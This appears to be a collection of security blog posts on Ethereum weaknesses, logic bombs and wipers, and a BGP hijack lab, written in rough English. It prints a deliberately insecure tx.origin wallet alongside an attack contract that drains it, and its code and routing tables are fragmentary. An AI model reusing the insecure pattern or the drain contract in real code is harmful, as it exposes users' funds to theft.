    5. As a result, the customized program can obtains SMS data (destination number, message text, service center number) from raw PDU.

Current status

It is hard to draw into conclusion on this discussion topics this moment. We keep our eye open see whether a new vulnerability find on Zygote in 3rd quarter in 2017 . Ok, have a good sleep.  Zzzzzzz……















The achilles heels of Ethereum (block chain technology)


What is Achilles heel: a small problem or weakness in a person or system that can result in failure. If you familiar with Chinese Kung Fu,  the key word “achilles heels” you might not feeling unfamiliar.

Wake the world attention – Ethereum security incidents

Jun 2016 –  Decentralized Autonomous Organization (DAO) attack – Code Issue Leads to $60 Million Ether Theft

Jul 2017South Korea’s largest Bitcoin/Ethereum cryptocurrency exchange ‘Bithumb’ hacked and over $1 Million in cryptocurrencies stolen

Ethereum claimed itself that he is the most Secure Public Blockchain. He is on the way overtaking Bitcoin technology. But what’s the key factor causes cyber security incidents happened in past?

The technical weakness summarized below:

  1. The Ethereum network itself might not vulnerable. “DAO” stands for “Decentralized Autonomous Organization”. It’s basically a type of application (a smart contract system) that can be deployed on the Ethereum network/blockchain. The hacker took advantage of a vulnerability in the contract code, written in the JavaScript allows a single participant to “drain” Ethereum tokens from the collected pool of all the investor money to a separate personal pool, which “the attacker” can then use by himself.
  2. A warning about the mempool transaction replacement mechanism.Implementors should take this into account and try to create contract mechanisms that do not rely on mempool replacement if they wish to have their implementations work with current implementations.
  3. Large Hashrate Pools Accidental suspend the services. Pools with larger hash-rates have recently been using the built in feature to only process their nodes own transactions. High volume of transaction which waiting for confirmation will slow down the performance of the pool causes services suspended.

Sample survey – in regards to cyber security incidents in the past

Investigation step 1 – Does Ethereum client have memory pool?

Yes, similar concept of memory pool definition will be valid in client side. The similar function  is for keeps transactions like Bitcoin’s mempool. The naming convention of the key term is the Transaction Pool, or TxPool in the code (see below)

var (
    // Transaction Pool Errors

const (
    maxQueued = 64 // max limit of queued txs per address

// TxPool contains all currently known transactions. Transactions
// enter the pool when they are received from the network or submitted
// locally. They exit the pool when they are included in the blockchain.
// The pool separates processable transactions (which can be applied to the
// current state) and future transactions. Transactions move between those
// two states over time as they are received and processed.
type TxPool struct {
    quit         chan bool // Quiting channel

Inherent risk & design limitation

i. Transactions may reverted

Ethereum Virtual Machine (EVM Level)

Python – If C calls, and foo does a throw ((bad jump, out-of-gas, or any other exception), as a result the entire transaction reverted.

Known bug bug in geth v1.4.19 and v1.5.2 – Geth was failing to revert empty account deletions when the transaction causing the deletions of empty accounts ended with an an out-of-gas exception. An additional issue was found in Parity, where the Parity client incorrectly failed to revert empty account deletions in a more limited set of contexts involving out-of-gas calls to precompiled contracts; the new Geth behavior matches Parity’s, and empty accounts will cease to be a source of concern in general in about one week once the state clearing process finishes.

Remark: out of gas definition – The gas cost can only be estimated until the transaction is executed against the actual contract state at the time of execution on the blockchain. If the transaction run out of gas before transaction complete. EVM exceptions result in all gas being consumed, and the transaction being rolled back. Gas is not returned if a transaction is unsuccessful because otherwise malicious users could spam the network with unsuccessful transactions.

ii. Authorization security consideration – Never use tx.origin for authorization (Detail 1). If your wallet had checked msg.sender for authorization, it would get the address of the attack wallet, instead of the owner address. But by checking tx.origin, it gets the original address that kicked off the transaction, which is still the owner address. The attack wallet instantly drains all your funds (Detail 2).

wallet contract – Detail 1

pragma solidity ^0.4.11;

contract TxUserWallet {
    address owner;

    function TxUserWallet() {
        owner = msg.sender;

    function transferTo(address dest, uint amount) {
        require(tx.origin == owner);

attack wallet – Detail 2

pragma solidity ^0.4.0;

contract TxAttackWallet {
    address owner;

    function TxAttackWallet() {
        owner = msg.sender;

    function() {
        TxUserWallet(msg.sender).transferTo(owner, msg.sender.balance);

Ethereum enhance the programming language of protection.But what’ the reason let’s the Biggest Ethereum and Bitcoin Exchanges Got Hacked?

About South Korea’s Largest Ethereum Exchange Was Hacked – Headline news hints that the attackers are setting their sights on people’s digital currency wallets (see following url for reference) From technical point of view, this is client side data breach instead of server side, right.  Since the case is under South Korea law enforcement investigation. No details provides in the meantime. For more detail, please read following url

My comment in regards to this case – since cyber incident more possibility happens on computer user negligence. Yes, I agree that we must focus the system and application design limitation. Since no any conclusion or prediction this moment. But a hints would like to bring to your consideration . Be my guest, see below detail for reference.

Fundamental design weakness of Ethereum node implemented in Go

Reference: When you are going to unlock account.   The command tool Geth will be used.  You’ll be prompted to type in the password afterward.

geth --unlock <YOUR_ACCOUNT_ADDRESS> --password <YOUR_PASSWORD>

A security concerns was happend here! In the earlier versions of Geth, providing the password as a parameter would cause the password to show up in the Geth log.  So our clever reader will speculated the story and final result properly. There is not required to mention the details again, right?

RemarkGeth is a multipurpose command line tool that runs a full Ethereum node implemented in Go. It offers three interfaces: the command line subcommands and options, a Json-rpc server and an interactive console.

Have a nice weekend.


Rouge-et-noir , they are all going to achieve this objective (blockchain or Hyperledger)









21st century kill chain (logic bomb, cyber bomb and ransomware)


The 21st century is the current century of the Anno Domini era, in accordance with the Gregorian calendar. It began on January 1, 2001 and will end on December 31, 2100. It is the first century of the 3rd millennium.

We can’t tolerate cyber attack happen in election again, President said.

Headline news told that former president Obaman intend to use new technique to reduce other country especially Russia engage the cyber attack to USA during 2016 election of president. The solution is that activate a cyber bomb technique. But this idea did not action yet.

What is a logic bomb?

A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. The technical term so called slag code.

What is slag code?

It is not a virus, but works in a similar pattern. From technical point of view, slag code sounds like a set of instructions inserted into a program that are designed to execute the target action (sounds like “explode”).

Scenario – The technical term so called network exploded. The result of this explosion contains delete data ,corrupt data or have other harmful effects.


Below  example (Picture A) shown that only implement a simple command syntax to a windows workstation. The process will consume all the CPU resources until windows OS shutdown. This is the concept idea of a slag code. Do you think similar attack concept can whether be affect the services provider network equipment?

Picture A – slag code

How powerful of the cyber bomb, is it possible?

Above concept can show you that your workstation execute a slag code and result not operation properly. The service get back normal until reboot. What if, the telecommunication services provider receive the slav code crafted by expert. What’s the worst situation is?

Logic Bomb 

Logic Bomb 1 – infectious media (malware)

The logic bomb goal to achieve a destructive result. The infectious media relies on malware. The malware structure will  be consists of a executable file ( Agent.exe ). This file is for triggered the wiping function. Besides this file contains a hex string. For example – a hex string display 65B417D8. When we convert the hex code to numeric value, it indicate that this is the date and time of the attack to begin (June 30, 2017 at 2pm local time (2017-6-30 14:00:00)). As soon as the internal system clock on the machine hit 14:00:01, the wiper (agent) was triggered to overwrite the hard drive and master boot record on Microsoft OS of machines and then reboot the system. The malicious code can access and compromise Windows-based systems inside the industrial control network. After a Windows system has been infected, the weapon would be stealthy enough to evade IT security controls while it searches for a target system

Logic Bomb 2 – A persistent attack (the packets being constantly injected)

A persistent attack occurs when the attacker would put bad packets into a router and it would lead to vulnerabilities being exploited/revealed during the process. Significant damage can occur during this attack because packets would be flooded into the router and can end up suspend the routing function.

Remark: These attacks are very complicated to detect.

Logic Bomb 3 – The mistrating attacks

The mistreating attacks can be caused indirectly by directing an irresistible number of packers to the target victim address. Let the victim (router and network) isolated. In the means that the network services will be suspended.


Cyber warfare arsenal (major weapon)


Since this topic we discussed in past , for more details, please see below URL for reference.

The other side of the story on cyber attack (Electronic war between countries)

Informaiton Supplement  – BGP hijack attack

Below idea show a rogue AS falsely advertises a shorter path to reach a prefix P, which causes other AS’es to route traffic destined to the prefix P through the shorter path.


There are four AS’s: AS1, AS2, AS3 and AS4 (rogue).

Each routing daemon’s peers are shown using connections:

  1. Router 1 peers with router 2 and router 4.
  2. Router 2 peers with router 1 and router 3.
  3. Router 3 peers with router 4.

 1 – Show router 1 routing entries

BGP table version is 0, 
local router ID is

Network Next Hop Metric LocPrf Weight Path    0           32768  i    0               0  2 i                    0  2 3 i

Reminder A: On AS1, the chosen AS path to reach is “2 3” (i.e., via AS2 and AS3).

2: Start the rogue AS, the rogue AS will connect to AS1 and advertise a route to using a shorter path (i.e., a direct path from AS1 to AS4). Thus, AS1 will choose this shorter path by default.

3. Show router 1 routing entries again

BGP table version is 0, 
local router ID is 

Network Next Hop Metric LocPrf Weight Path     0           32768 i     0               0 2 i     0               0 4 i     0                 2 3 i

We can see AS4’s chosen path and also AS3’s path in the routing information base of AS1.
Since the AS path length to reach is smaller through AS4, router 1 chooses AS4 as its next hop.

From technical point of view, it successfully hijack the traffic in BGP network. We known internet routing protocol is using BGP. No suprise, this is only a basic theory. More complex and advance technique is under develop by different countries.
See who show his power to the world.


On our discussion of this topic, I am not going to input key word conclusion on the end of page this time. As we know, above items is my speculation. Believed it or not , the cyber attack atmosphere looks similar with discussion in past.

But bear in mind that any product includes cyber weapon require test and pilot run. These rehearsal looks mandatory since it is hard to foreseen the overall damage effect (including the response of the countries). On the other hand it is a test to know the actual system specification in hostile country. It compared to traditional way become more effective! Hire a spy infiltrate to hostile country is not the way today. Do you agree?

I am going to write more interested topics. Hope you will be interest. See you. Have a nice weekend.